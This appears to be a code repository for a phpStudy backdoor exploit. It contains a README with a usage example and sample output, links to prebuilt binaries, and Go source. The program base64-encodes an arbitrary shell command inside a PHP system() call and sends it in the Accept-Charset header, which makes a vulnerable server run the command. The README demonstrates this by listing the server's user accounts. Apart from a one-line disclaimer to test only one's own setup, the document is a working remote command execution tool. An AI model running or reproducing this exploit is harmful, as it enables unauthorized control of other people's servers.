├── README.md
├── phpstudy_backdoor-amd64
├── phpstudy_backdoor-amd64.exe
├── phpstudy_backdoor-darwin-amd64
├── phpstudy_backdoor-darwin-i386
├── phpstudy_backdoor-i386
├── phpstudy_backdoor-i386.exe
└── phpstudy_backdoor.go
/README.md:
--------------------------------------------------------------------------------
1 | # phpstudy_backdoor
2 |
3 |
4 | 仅供检测 自己的 phpstudy环境,请勿对其他网站使用。
5 |
6 | ` go run phpstudy_backdoor.go http://8.8.8.8/ "net user" `
7 |
8 |
9 | ```
10 | Active code page: 65001
11 |
12 | User accounts for \\WIN-25US8G3F849
13 |
14 | -------------------------------------------------------------------------------
15 | Administrator Guest
16 | The command completed successfully.
17 |
18 | ```
19 |
--------------------------------------------------------------------------------
/phpstudy_backdoor-amd64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-amd64
--------------------------------------------------------------------------------
/phpstudy_backdoor-amd64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-amd64.exe
--------------------------------------------------------------------------------
/phpstudy_backdoor-darwin-amd64:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-darwin-amd64
--------------------------------------------------------------------------------
/phpstudy_backdoor-darwin-i386:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-darwin-i386
--------------------------------------------------------------------------------
/phpstudy_backdoor-i386:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-i386
--------------------------------------------------------------------------------
/phpstudy_backdoor-i386.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Any3ite/phpstudy_backdoor/688c0c306186efedb04657624530aa563578b73b/phpstudy_backdoor-i386.exe
--------------------------------------------------------------------------------
/phpstudy_backdoor.go:
--------------------------------------------------------------------------------
1 | package main
2 |
3 | import (
4 | _"compress/gzip"
5 | "encoding/base64"
6 | "fmt"
7 | "io/ioutil"
8 | "net/http"
9 | "os"
10 | "regexp"
11 |
12 | )
13 |
14 | func main() {
15 | evalcmd := os.Args[2]
16 | evalfunc := "echo '\r\n\r\n';system(\"chcp 65001 && " + evalcmd + "\");echo '\r\n';"
17 | encodeString := base64.StdEncoding.EncodeToString([]byte(evalfunc))
18 | attack_Domain := os.Args[1]
19 | req, _ := http.NewRequest("GET", attack_Domain, nil)
20 | req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36")
21 | req.Header.Set("Connection", "keep-alive")
22 | req.Header.Set("Accept-Charset", encodeString)
23 | req.Header.Set("Accept-Encoding", "gzip,deflate")
24 | resp, err := (&http.Client{}).Do(req)
25 | if err != nil {
26 | fmt.Println("error")
27 | }
28 | body, err := ioutil.ReadAll(resp.Body)
29 | reg := regexp.MustCompile(`(?s:(.*?))`)
30 | if reg == nil {
31 | fmt.Println("正则匹配失败")
32 | return
33 | }
34 | str := string(body)
35 | result := reg.FindAllStringSubmatch(str,-1)
36 | for _, text := range result {
37 | fmt.Println(text[1])
38 | }
39 | }
--------------------------------------------------------------------------------